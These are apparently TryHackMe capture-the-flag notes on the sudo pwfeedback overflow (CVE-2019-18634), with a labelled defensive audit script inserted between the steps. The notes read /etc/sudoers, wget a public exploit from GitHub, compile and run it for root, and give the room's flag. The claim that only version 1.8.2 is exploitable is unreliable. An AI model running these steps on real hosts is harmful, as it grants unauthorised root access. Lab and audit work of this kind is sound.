Identify:
cat /etc/sudoers
If the output contains “pwfeedback” (the option that makes **** appear as you type a password), you can try this exploit.
If you can’t read /etc/sudoers, check the sudo version instead:
sudo -V
If the version is 1.8.2, then it can be done.
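The two identification checks above, combined into an audit script (an added example, not part of the original notes): it reports whether a host is exposed and prints the mitigation. The function names and the sample sudoers text are constructed for illustration; the version bounds (1.7.1 up to, but not including, 1.8.26) are taken from the upstream sudo advisory for CVE-2019-18634, not from this page.

```shell
#!/bin/sh
# Added example: exposure check for the sudo pwfeedback overflow (CVE-2019-18634).

# Return 0 if the sudoers text on stdin leaves pwfeedback enabled.
# Skips comments, walks comma-separated Defaults lists, honours a later global
# "!pwfeedback", and conservatively counts any scoped enable (Defaults:user ...).
pwfeedback_enabled() {
    awk '
        /^[ \t]*#/ { next }
        /^[ \t]*Defaults/ {
            line = $0
            scoped = (line ~ /^[ \t]*Defaults[^ \t]/)
            sub(/#.*/, "", line)                          # inline comment
            sub(/^[ \t]*Defaults[^ \t]*[ \t]+/, "", line) # keyword and scope
            sub(/[ \t]+$/, "", line)
            n = split(line, opts, /[ \t]*,[ \t]*/)
            for (i = 1; i <= n; i++) {
                if (opts[i] == "pwfeedback") { if (scoped) any_scoped = 1; else glob = 1 }
                if (opts[i] == "!pwfeedback" && !scoped) glob = 0
            }
        }
        END { exit !(glob || any_scoped) }
    '
}

# Return 0 if the version (as printed by "sudo -V", e.g. 1.8.21p2) is in the
# range where the overflow is reachable: 1.7.1 <= version < 1.8.26.
version_exploitable() {
    printf '%s\n' "${1%%[!0-9.]*}" |
        awk -F. '{ v = $1*10000 + $2*100 + $3; exit !(v >= 10701 && v < 10826) }'
}

# assess <version>, sudoers text on stdin: print a one-line verdict.
assess() {
    if ! pwfeedback_enabled; then echo "not exposed: pwfeedback is off"
    elif version_exploitable "$1"; then echo "EXPOSED: upgrade sudo or set 'Defaults !pwfeedback'"
    else echo "pwfeedback is on, but this version is outside the exploitable range"
    fi
}

# Constructed sample input (not taken from a real host).
SAMPLE_SUDOERS='Defaults env_reset,pwfeedback
# Defaults !pwfeedback
root ALL=(ALL:ALL) ALL'
printf '%s\n' "$SAMPLE_SUDOERS" | assess 1.8.21p2
```

On a live host, pipe the real configuration in and take the version from the first line of sudo -V, for example: sudo cat /etc/sudoers /etc/sudoers.d/* | assess "$(sudo -V | awk 'NR==1{print $3}')".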
Exploit:
get it:
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
compile:
gcc -o <output-file> <source-file>
gcc -o exploit exploit.c
run:
./exploit
Flag:
THM{buff3r_0v3rfl0w_rul3s}